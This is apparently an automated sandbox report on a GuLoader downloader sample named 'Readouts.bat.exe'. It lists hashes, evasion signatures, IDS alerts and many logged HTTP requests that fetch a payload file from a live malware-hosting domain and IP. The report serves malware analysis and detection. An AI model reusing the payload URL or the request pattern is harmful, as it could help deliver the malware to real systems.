Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Readouts.bat.exe

Overview

General Information

Sample name:Readouts.bat.exe
Analysis ID:1562049
MD5:492707a5e753b9c5faa6a9829e065775
SHA1:7a48c9ae447780551a9714b5cccde57f16094e01
SHA256:8a0a6bad685a0e4517d2f1e8f70fff1195c78470e467255dfeb1c3f7ec922514
Tags:batexeuser-abuse_ch
Infos:

Detection

GuLoader
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Readouts.bat.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\Readouts.bat.exe" MD5: 492707A5E753B9C5FAA6A9829E065775)
    • Readouts.bat.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\Readouts.bat.exe" MD5: 492707A5E753B9C5FAA6A9829E065775)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1852688575.0000000005615000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000003.00000002.2593525924.0000000002115000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-25T07:10:15.414083+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:16.425791+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:16.924356+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:17.433680+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:17.937521+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:18.443656+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:18.941014+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:19.452236+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:19.961128+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:20.656657+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:21.158710+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:21.845112+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:22.531390+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:23.053053+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:23.735340+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:24.421656+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:25.109884+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:25.799845+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:26.296691+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:26.989058+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:27.484129+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:28.171764+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:28.861049+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:29.359928+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:29.860219+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:30.363969+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:30.860822+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:31.360829+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:31.926133+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:32.443785+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:33.124946+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:33.625575+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:34.314657+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:34.877413+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:35.374658+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:35.875189+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:36.375607+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:36.874871+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:37.375080+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:37.874325+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:38.376401+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:38.874743+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:39.375269+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:40.063815+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:40.562441+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:41.301644+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:41.800527+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:42.312703+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:42.813258+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:43.503967+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:44.079831+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:44.578179+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:45.078376+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:45.766469+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:46.265958+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:47.421828+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:47.921830+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:48.421627+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:48.922449+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:49.632921+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:50.329237+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:51.018693+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:51.520982+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:52.017563+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:52.575298+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:53.082123+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:53.578696+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:54.265704+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:54.766529+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:55.500728+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:56.000236+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:56.499944+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:56.999819+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:57.500463+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:58.047012+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:58.546788+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:59.054871+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:10:59.546809+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:00.254704+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:00.938221+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:01.442254+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:01.937220+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:02.438608+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:02.937446+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:03.438644+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:03.937560+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:04.440018+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:04.985366+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:05.656175+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:06.156425+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:06.657181+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:07.158738+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:07.843879+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:08.347101+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:08.843842+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:09.533122+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:10.033404+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:10.533338+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:11.387665+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:11.900404+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:12.407056+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:12.908280+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:13.407573+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:13.907182+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:14.406156+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:14.906136+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:15.406184+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:15.907688+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:16.593836+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:17.097669+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:17.594390+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:18.094773+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:18.593749+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:19.093741+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:19.593973+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:20.111587+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:20.615394+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:21.109632+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:21.609591+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP
      2024-11-25T07:11:22.109947+010028032702Potentially Bad Traffic192.168.2.749834172.93.121.12680TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://kkaou.lamd.shop/ts.binTAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binLAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binVAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binHAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binYAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binwshqos.dll.mui3Avira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.bingAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.bincAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.bin%Avira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binwshqos.dll.muiAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binmAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.biniAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.bin6Avira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.bin3Avira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binrAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binqAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.bin0Avira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binwshqos.dll.muiYAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binzAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.bin8Avira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binmswsock.dll.muiAvira URL Cloud: Label: malware
      Source: http://kkaou.lamd.shop/ts.binBAvira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted file
      Source: Readouts.bat.exeReversingLabs: Detection: 13%
      Source: Readouts.bat.exeVirustotal: Detection: 20%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: Readouts.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: Readouts.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmp
      Source: Binary string: mshtml.pdbUGP source: Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmp
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49834 -> 172.93.121.126:80
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ts.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: kkaou.lamd.shopCache-Control: no-cache
